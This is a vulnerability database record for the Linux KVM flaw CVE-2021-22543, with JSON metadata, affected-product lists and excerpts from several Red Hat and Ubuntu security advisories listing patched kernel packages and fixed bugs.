    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "resource management error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202011-1793"
      }
    ],
    "trust": 0.6
  }
}

var-202105-1451
Vulnerability from variot

An issue was discovered in Linux: KVM through Improper handling of VM_IO|VM_PFNMAP vmas in KVM can bypass RO checks and can lead to pages being freed while still accessible by the VMM and guest. This allows users with the ability to start and control a VM to read/write random pages of memory and can result in local privilege escalation. Arch Linux is an application system of Arch open source. A lightweight and flexible Linux® distribution that tries to keep it simple. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

====================================================================
Red Hat Security Advisory

Synopsis: Important: kernel security update Advisory ID: RHSA-2021:3812-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2021:3812 Issue date: 2021-10-12 CVE Names: CVE-2021-3653 CVE-2021-3656 CVE-2021-22543 CVE-2021-22555 CVE-2021-37576 ==================================================================== 1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 7.6 Advanced Update Support, Red Hat Enterprise Linux 7.6 Telco Extended Update Support, and Red Hat Enterprise Linux 7.6 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Relevant releases/architectures:

Red Hat Enterprise Linux Server AUS (v. 7.6) - noarch, x86_64 Red Hat Enterprise Linux Server E4S (v. 7.6) - noarch, ppc64le, x86_64 Red Hat Enterprise Linux Server Optional AUS (v. 7.6) - x86_64 Red Hat Enterprise Linux Server Optional E4S (v. 7.6) - ppc64le, x86_64 Red Hat Enterprise Linux Server Optional TUS (v. 7.6) - x86_64 Red Hat Enterprise Linux Server TUS (v. 7.6) - noarch, x86_64

  1. Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

  1. Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

  1. Package List:

Red Hat Enterprise Linux Server AUS (v. 7.6):

Source: kernel-3.10.0-957.84.1.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-957.84.1.el7.noarch.rpm kernel-doc-3.10.0-957.84.1.el7.noarch.rpm

x86_64: bpftool-3.10.0-957.84.1.el7.x86_64.rpm kernel-3.10.0-957.84.1.el7.x86_64.rpm kernel-debug-3.10.0-957.84.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-957.84.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-957.84.1.el7.x86_64.rpm kernel-devel-3.10.0-957.84.1.el7.x86_64.rpm kernel-headers-3.10.0-957.84.1.el7.x86_64.rpm kernel-tools-3.10.0-957.84.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-957.84.1.el7.x86_64.rpm perf-3.10.0-957.84.1.el7.x86_64.rpm perf-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm python-perf-3.10.0-957.84.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server E4S (v. 7.6):

Source: kernel-3.10.0-957.84.1.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-957.84.1.el7.noarch.rpm kernel-doc-3.10.0-957.84.1.el7.noarch.rpm

ppc64le: kernel-3.10.0-957.84.1.el7.ppc64le.rpm kernel-bootwrapper-3.10.0-957.84.1.el7.ppc64le.rpm kernel-debug-3.10.0-957.84.1.el7.ppc64le.rpm kernel-debug-debuginfo-3.10.0-957.84.1.el7.ppc64le.rpm kernel-debuginfo-3.10.0-957.84.1.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-957.84.1.el7.ppc64le.rpm kernel-devel-3.10.0-957.84.1.el7.ppc64le.rpm kernel-headers-3.10.0-957.84.1.el7.ppc64le.rpm kernel-tools-3.10.0-957.84.1.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-957.84.1.el7.ppc64le.rpm kernel-tools-libs-3.10.0-957.84.1.el7.ppc64le.rpm perf-3.10.0-957.84.1.el7.ppc64le.rpm perf-debuginfo-3.10.0-957.84.1.el7.ppc64le.rpm python-perf-3.10.0-957.84.1.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-957.84.1.el7.ppc64le.rpm

x86_64: kernel-3.10.0-957.84.1.el7.x86_64.rpm kernel-debug-3.10.0-957.84.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-957.84.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-957.84.1.el7.x86_64.rpm kernel-devel-3.10.0-957.84.1.el7.x86_64.rpm kernel-headers-3.10.0-957.84.1.el7.x86_64.rpm kernel-tools-3.10.0-957.84.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-957.84.1.el7.x86_64.rpm perf-3.10.0-957.84.1.el7.x86_64.rpm perf-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm python-perf-3.10.0-957.84.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server TUS (v. 7.6):

Source: kernel-3.10.0-957.84.1.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-957.84.1.el7.noarch.rpm kernel-doc-3.10.0-957.84.1.el7.noarch.rpm

x86_64: bpftool-3.10.0-957.84.1.el7.x86_64.rpm kernel-3.10.0-957.84.1.el7.x86_64.rpm kernel-debug-3.10.0-957.84.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-957.84.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-957.84.1.el7.x86_64.rpm kernel-devel-3.10.0-957.84.1.el7.x86_64.rpm kernel-headers-3.10.0-957.84.1.el7.x86_64.rpm kernel-tools-3.10.0-957.84.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-957.84.1.el7.x86_64.rpm perf-3.10.0-957.84.1.el7.x86_64.rpm perf-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm python-perf-3.10.0-957.84.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional AUS (v. 7.6):

x86_64: kernel-debug-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-957.84.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-957.84.1.el7.x86_64.rpm perf-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional E4S (v. 7.6):

ppc64le: kernel-debug-debuginfo-3.10.0-957.84.1.el7.ppc64le.rpm kernel-debug-devel-3.10.0-957.84.1.el7.ppc64le.rpm kernel-debuginfo-3.10.0-957.84.1.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-957.84.1.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-957.84.1.el7.ppc64le.rpm kernel-tools-libs-devel-3.10.0-957.84.1.el7.ppc64le.rpm perf-debuginfo-3.10.0-957.84.1.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-957.84.1.el7.ppc64le.rpm

x86_64: kernel-debug-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-957.84.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-957.84.1.el7.x86_64.rpm perf-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional TUS (v. 7.6):

x86_64: kernel-debug-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-957.84.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-957.84.1.el7.x86_64.rpm perf-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-957.84.1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. References:

https://access.redhat.com/security/cve/CVE-2021-3653 https://access.redhat.com/security/cve/CVE-2021-3656 https://access.redhat.com/security/cve/CVE-2021-22543 https://access.redhat.com/security/cve/CVE-2021-22555 https://access.redhat.com/security/cve/CVE-2021-37576 https://access.redhat.com/security/updates/classification/#important

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iQIVAwUBYWWkrNzjgjWX9erEAQgeVg//eBUd0HQYAc3u6Nc1nBOOBM+SWHAI6rwT SWbLidMennvaCylOWpdL23fkpPkhCRyj5fbXen2dQGtUop2sEm6nmVLFW6cQO8Yv rfXN3wnrW8P0Ah3QtWeV1O22ah8WzcgeML96xyUl3K7yJSY+evXYYBUM7Q8nbzW1 0K7VJm79SxRsszcNq3R/mG5MuPJV+cSnSlG+1cqK+A+YRVKDIE/7vWiTS1z9GDlY /DIlKzvEcsyaOFnKYg+RQRQ5HCB5Hp2JNjRrz5F+X+KJRoT6KTDlbFY/a34FjYWA fUN3pA0aQtdGgQsAB6+T+pVGTYq0vRWPOXhnN2OaN7a95OwbVC9DmiQXwjLQnn2C rvU52ExQP6Jf+WfNHo7yfFMgR1Eyihkc+/zf0qPQomuEqMjEfqyMXOoPsCoXotGs OBJEVIYvBmA7CYif9L0cQRNJyTFfv1IcXKgP2UgrGdChQnLBz/ijVUU17HcU783R G6hXh2+Ojllbt5/rf2PQfFZYjswIVuGe9/You+T6qQXJ+zInz1GOi92+Vwv+gEGF KNLqZJ1nvB1xOm60noCBhnke5vPbzFA+YNGSJnc0tLxZ6Dek891Qb1Eq1f+rwR/9 wfCEgECYLoGvlc2RXC12m13BLUTL+VjVyc0KmG/O9vjFD42EzeFo8rpuXjVsF7QJ S627544rR1c=4NQZ -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Description:

Red Hat Advanced Cluster Management for Kubernetes 2.3.3 images

Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private cloud environments. Clusters and applications are all visible and managed from a single console—with security policy built in.

Security fixes:

  • nginx: Off-by-one in ngx_resolver_copy() when labels are followed by a pointer to a root domain name (CVE-2021-23017)

  • redis: Lua scripts can overflow the heap-based Lua stack (CVE-2021-32626)

  • redis: Integer overflow issue with Streams (CVE-2021-32627)

  • redis: Integer overflow bug in the ziplist data structure (CVE-2021-32628)

  • redis: Integer overflow issue with intsets (CVE-2021-32687)

  • redis: Integer overflow issue with strings (CVE-2021-41099)

  • redis: Out of bounds read in lua debugger protocol parser (CVE-2021-32672)

  • redis: Denial of service via Redis Standard Protocol (RESP) request (CVE-2021-32675)

  • helm: information disclosure vulnerability (CVE-2021-32690)

Bug fixes:

  • KUBE-API: Support move agent to different cluster in the same namespace (BZ# 1977358)

  • Add columns to the Agent CRD list (BZ# 1977398)

  • ClusterDeployment controller watches all Secrets from all namespaces (BZ# 1986081)

  • RHACM 2.3.3 images (BZ# 1999365)

  • Workaround for Network Manager not supporting nmconnections priority (BZ# 2001294)

  • create cluster page empty in Safary Browser (BZ# 2002280)

  • Compliance state doesn't get updated after fixing the issue causing initially the policy not being able to update the managed object (BZ# 2002667)

  • Overview page displays VMware based managed cluster as other (BZ# 2004188)

  • Solution:

Before applying this update, make sure all previously released errata relevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):

1963121 - CVE-2021-23017 nginx: Off-by-one in ngx_resolver_copy() when labels are followed by a pointer to a root domain name 1977358 - [4.8.0] KUBE-API: Support move agent to different cluster in the same namespace 1977398 - [4.8.0] [master] Add columns to the Agent CRD list 1978144 - CVE-2021-32690 helm: information disclosure vulnerability 1986081 - [4.8.0] ClusterDeployment controller watches all Secrets from all namespaces 1999365 - RHACM 2.3.3 images 2001294 - [4.8.0] Workaround for Network Manager not supporting nmconnections priority 2002280 - create cluster page empty in Safary Browser 2002667 - Compliance state doesn't get updated after fixing the issue causing initially the policy not being able to update the managed object 2004188 - Overview page displays VMware based managed cluster as other 2010991 - CVE-2021-32687 redis: Integer overflow issue with intsets 2011000 - CVE-2021-32675 redis: Denial of service via Redis Standard Protocol (RESP) request 2011001 - CVE-2021-32672 redis: Out of bounds read in lua debugger protocol parser 2011004 - CVE-2021-32628 redis: Integer overflow bug in the ziplist data structure 2011010 - CVE-2021-32627 redis: Integer overflow issue with Streams 2011017 - CVE-2021-32626 redis: Lua scripts can overflow the heap-based Lua stack 2011020 - CVE-2021-41099 redis: Integer overflow issue with strings

  1. These packages include redhat-release-virtualization-host, ovirt-node, and rhev-hypervisor. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks.

Bug Fix(es):

  • Rebase package(s) to version: 1.2.23

Highlights, important fixes, or notable enhancements:

  • imgbase should not copy the selinux binary policy file (BZ# 1979624) (BZ#1989397)

  • RHV-H has been rebased on Red Hat Enterprise Linux 8.4 Batch #2. (BZ#1975177)

  • 8) - aarch64, noarch, ppc64le, s390x, x86_64

Bug Fix(es):

  • Urgent: Missing dptf_power.ko module in RHEL8 (BZ#1968381)

  • [mlx5] kdump over NFS fails: mlx5 driver gives error "Stop room 95 is bigger than the SQ size 64" (BZ#1969909)

  • BUG: unable to handle kernel NULL pointer dereference at 0000000000000000 in bluetooth hci_error_reset on intel-tigerlake-h01 (BZ#1972564)

  • Update CIFS to kernel 5.10 (BZ#1973637)

  • Backport "tick/nohz: Conditionally restart tick on idle exit" to RHEL 8.5 (BZ#1978710)

  • Significant performance drop starting on kernel-4.18.0-277 visible on mmap benchmark (BZ#1980314)

  • Inaccessible NFS server overloads clients (native_queued_spin_lock_slowpath connotation?) (BZ#1980613)

  • [RHEL8.4 BUG],RialtoMLK, I915 graphic driver failed to boot with one new 120HZ panel (BZ#1981250)

  • act_ct: subject to DNAT tuple collision (BZ#1982494)

Enhancement(s):

  • [Lenovo 8.5 FEAT] drivers/nvme - Update to the latest upstream (BZ#1965415)

  • 7.3) - x86_64

  • Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.7.28. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHBA-2021:3263

Space precludes documenting all of the container images in this advisory.

Bug Fix(es):

  • Machine Config Operator degrades during cluster update with failed to convert Ignition config spec v2 to v3 (BZ#1956462)

  • OCP IPI Publish Internal - GCP: Load Balancer service with External Traffic Policy as Local is not working (BZ#1971669)

  • [4.7] Unable to attach Vsphere volume shows the error "failed to get canonical path" (BZ#1973766)

  • oc logs doesn't work with piepeline builds (BZ#1974264)

  • "provisioned registration errors" cannot be reported (BZ#1976924)

  • AWS Elastic IP permissions are incorrectly required (BZ#1981553)

  • Memory consumption (container_memory_rss) steadily growing for /system.slice/kubelet.service when FIPS enabled [ocp 4.7] (BZ#1981580)

  • Problematic Deployment creates infinite number Replicasets causing etcd to reach quota limit (BZ#1981775)

  • Size of the hostname was preventing proper DNS resolution of the worker node names (BZ#1983695)

  • (release-4.7) Insights status card shows nothing when 0 issues found (BZ#1986724)

  • drop-icmp pod blocks direct SSH access to cluster nodes (BZ#1988426)

  • Editing a Deployment drops annotations (BZ#1989642)

  • [Kuryr][4.7] Duplicated egress rule for service network in knp object (BZ#1990175)

  • Update failed - ovn-nbctl: duplicate nexthop for the same ECMP route (BZ#1991445)

  • Unable to install a zVM hosted OCP 4.7.24 on Z Cluster based on new RHCOS 47 RHEL 8.4 based build (BZ#1992240)

  • alerts: SystemMemoryExceedsReservation triggers too quickly (BZ#1992687)

  • failed to start cri-o service due to /usr/libexec/crio/conmon is missing (BZ#1993386)

  • Thanos build failure: vendor/ ignored (BZ#1994123)

  • Ipv6 IP addresses are not accepted for whitelisting (BZ#1994645)

  • upgrade from 4.6 to 4.7 to 4.8 with mcp worker "paused=true", crio report "panic: close of closed channel" which lead to a master Node go into Restart loop (BZ#1994729)

  • linuxptp-daemon crash on 4.8 (BZ#1995579)

  • long living clusters may fail to upgrade because of an invalid conmon path (BZ#1995810)

For more details about the security issue(s), refer to the CVE page(s) listed in the References section.

You may download the oc tool and use it to inspect release image metadata as follows:

(For x86_64 architecture)

$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.28-x86_64

The image digest is sha256:b3f38d58057a12b0477bf28971390db3e3391ce1af8ac06e35d0aa9e8d8e5966

(For s390x architecture)

$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.28-s390x

The image digest is sha256:30c2011f6d84b16960b981a07558f96a55e59a281449d25c5ccc778aaeb2f970

(For ppc64le architecture)

$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.28-ppc64le

The image digest is sha256:52ebf0db5a36434357c24a64863025730d2159a94997333f15fbe1444fa88f4f

Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.7/updating/updating-cluster - -between-minor.html#understanding-upgrade-channels_updating-cluster-between - -minor

  1. Solution:

For OpenShift Container Platform 4.7 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:

https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel ease-notes.html

Details on how to access this content are available at https://docs.openshift.com/container-platform/4.7/updating/updating-cluster - -cli.html

  1. Bugs fixed (https://bugzilla.redhat.com/):

1863446 - [Assisted-4.5-M2] clean all does not remove ConfigMaps and PVC 1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation 1956462 - Machine Config Operator degrades during cluster update with failed to convert Ignition config spec v2 to v3 1971669 - OCP IPI Publish Internal - GCP: Load Balancer service with External Traffic Policy as Local is not working 1973766 - [4.7] Unable to attach Vsphere volume shows the error "failed to get canonical path" 1974264 - oc logs doesn't work with piepeline builds 1976924 - "provisioned registration errors" cannot be reported 1981553 - AWS Elastic IP permissions are incorrectly required 1981775 - Problematic Deployment creates infinite number Replicasets causing etcd to reach quota limit 1983695 - Size of the hostname was preventing proper DNS resolution of the worker node names 1986724 - (release-4.7) Insights status card shows nothing when 0 issues found 1988426 - drop-icmp pod blocks direct SSH access to cluster nodes 1989642 - Editing a Deployment drops annotations 1990175 - [Kuryr][4.7] Duplicated egress rule for service network in knp object 1991445 - Update failed - ovn-nbctl: duplicate nexthop for the same ECMP route 1992240 - Unable to install a zVM hosted OCP 4.7.24 on Z Cluster based on new RHCOS 47 RHEL 8.4 based build 1992687 - alerts: SystemMemoryExceedsReservation triggers too quickly 1993386 - failed to start cri-o service due to /usr/libexec/crio/conmon is missing 1994123 - Thanos build failure: vendor/ ignored 1994645 - Ipv6 IP addresses are not accepted for whitelisting 1994729 - upgrade from 4.6 to 4.7 to 4.8 with mcp worker "paused=true", crio report "panic: close of closed channel" which lead to a master Node go into Restart loop 1995810 - long living clusters may fail to upgrade because of an invalid conmon path 1998112 - Networking issue with vSphere clusters running HW14 and later

  1. 8.1) - ppc64le, x86_64

  2. Description:

This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. ========================================================================== Ubuntu Security Notice USN-5094-1 September 29, 2021

linux, linux-aws, linux-aws-hwe, linux-azure, linux-azure-4.15, linux-dell300x, linux-gcp, linux-gcp-4.15, linux-hwe, linux-kvm, linux-oracle, linux-snapdragon vulnerabilities ==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 18.04 LTS
  • Ubuntu 16.04 ESM
  • Ubuntu 14.04 ESM

Summary:

Several security issues were fixed in the Linux kernel. An attacker who could start and control a VM could possibly use this to expose sensitive information or execute arbitrary code. (CVE-2021-22543)

It was discovered that the tracing subsystem in the Linux kernel did not properly keep track of per-cpu ring buffer state. A privileged attacker could use this to cause a denial of service. (CVE-2021-3679)

Alois Wohlschlager discovered that the overlay file system in the Linux kernel did not restrict private clones in some situations. An attacker could use this to expose sensitive information. (CVE-2021-3732)

Alexey Kardashevskiy discovered that the KVM implementation for PowerPC systems in the Linux kernel did not properly validate RTAS arguments in some situations. An attacker in a guest vm could use this to cause a denial of service (host OS crash) or possibly execute arbitrary code. (CVE-2021-37576)

It was discovered that the MAX-3421 host USB device driver in the Linux kernel did not properly handle device removal events. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2021-38204)

It was discovered that the Xilinx 10/100 Ethernet Lite device driver in the Linux kernel could report pointer addresses in some situations. An attacker could use this information to ease the exploitation of another vulnerability. (CVE-2021-38205)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 18.04 LTS: linux-image-4.15.0-1028-dell300x 4.15.0-1028.33 linux-image-4.15.0-1081-oracle 4.15.0-1081.89 linux-image-4.15.0-1100-kvm 4.15.0-1100.102 linux-image-4.15.0-1109-gcp 4.15.0-1109.123 linux-image-4.15.0-1112-aws 4.15.0-1112.119 linux-image-4.15.0-1113-snapdragon 4.15.0-1113.122 linux-image-4.15.0-1124-azure 4.15.0-1124.137 linux-image-4.15.0-159-generic 4.15.0-159.167 linux-image-4.15.0-159-generic-lpae 4.15.0-159.167 linux-image-4.15.0-159-lowlatency 4.15.0-159.167 linux-image-aws-lts-18.04 4.15.0.1112.115 linux-image-azure-lts-18.04 4.15.0.1124.97 linux-image-dell300x 4.15.0.1028.30 linux-image-gcp-lts-18.04 4.15.0.1109.128 linux-image-generic 4.15.0.159.148 linux-image-generic-lpae 4.15.0.159.148 linux-image-kvm 4.15.0.1100.96 linux-image-lowlatency 4.15.0.159.148 linux-image-oracle-lts-18.04 4.15.0.1081.91 linux-image-snapdragon 4.15.0.1113.116 linux-image-virtual 4.15.0.159.148

Ubuntu 16.04 ESM: linux-image-4.15.0-1081-oracle 4.15.0-1081.89~16.04.1 linux-image-4.15.0-1109-gcp 4.15.0-1109.123~16.04.1 linux-image-4.15.0-1112-aws 4.15.0-1112.119~16.04.1 linux-image-4.15.0-1124-azure 4.15.0-1124.137~16.04.1 linux-image-4.15.0-159-generic 4.15.0-159.167~16.04.1 linux-image-4.15.0-159-lowlatency 4.15.0-159.167~16.04.1 linux-image-aws-hwe 4.15.0.1112.103 linux-image-azure 4.15.0.1124.115 linux-image-gcp 4.15.0.1109.110 linux-image-generic-hwe-16.04 4.15.0.159.152 linux-image-gke 4.15.0.1109.110 linux-image-lowlatency-hwe-16.04 4.15.0.159.152 linux-image-oem 4.15.0.159.152 linux-image-oracle 4.15.0.1081.69 linux-image-virtual-hwe-16.04 4.15.0.159.152

Ubuntu 14.04 ESM: linux-image-4.15.0-1124-azure 4.15.0-1124.137~14.04.1 linux-image-azure 4.15.0.1124.97

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202105-1451",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "h410s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h700s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h500e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "33"
      },
      {
        "model": "h700e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "cloud backup",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "34"
      },
      {
        "model": "h300e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "solidfire baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2021-05-18"
      },
      {
        "model": "h500s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h300s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h410c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-22543"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2021-05-18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h410c_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h410c:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h300s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
